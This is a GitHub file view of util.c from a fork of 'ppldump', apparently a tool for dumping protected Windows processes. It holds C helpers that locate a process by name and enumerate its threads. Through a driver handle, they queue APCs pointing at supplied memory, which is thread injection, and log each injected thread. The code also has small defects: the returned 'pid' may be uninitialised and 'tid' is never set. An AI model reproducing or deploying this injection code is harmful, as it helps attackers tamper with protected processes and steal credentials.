forked from topotam/ppldump
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathutil.c
86 lines (70 loc) · 1.69 KB
/
util.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include "mlwrfox.h"
DWORD LocateProcess(
PCHAR szProcessName
)
{
HANDLE hProcSnap;
PROCESSENTRY32 pProc32;
DWORD pid;
hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if ( hProcSnap == INVALID_HANDLE_VALUE )
return (0);
pProc32.dwSize = sizeof(PROCESSENTRY32);
if ( !Process32First(hProcSnap, &pProc32) ) {
CloseHandle(hProcSnap);
return 0;
};
do
{
if ( strcmp(szProcessName, pProc32.szExeFile) == 0)
{
pid = pProc32.th32ProcessID;
break;
};
} while ( Process32Next(hProcSnap, &pProc32) );
CloseHandle(hProcSnap);
return pid;
};
DWORD LocateThread(
HANDLE hDriver,
DWORD dwProcId,
LPVOID pMemory,
LPVOID pParam,
BOOL ResetThreads
)
{
HANDLE hThrdSnap;
THREADENTRY32 pThrd32;
DWORD tid;
hThrdSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, dwProcId);
if ( hThrdSnap == INVALID_HANDLE_VALUE )
return (0);
pThrd32.dwSize = sizeof(THREADENTRY32);
if ( !Thread32First(hThrdSnap, &pThrd32) ) {
CloseHandle(hThrdSnap);
return 0;
};
do
{
if ( dwProcId == pThrd32.th32OwnerProcessID )
{
HANDLE hThread = NULL;
AcquireThread(hDriver, &pThrd32.th32ThreadID, &hThread);
if ( ResetThreads != TRUE ) {
QueueUserAPC((PAPCFUNC)pMemory, (HANDLE)hThread,
(ULONG_PTR)pParam);
printf("[+] Injected thread %i\n", pThrd32.th32ThreadID);
} else {
printf("[+] Resumed thread %i\n", pThrd32.th32ThreadID);
ResumeThread(hThread);
};
CloseHandle(hThread);
};
} while ( Thread32Next(hThrdSnap, &pThrd32) );
CloseHandle(hThrdSnap);
return tid;
};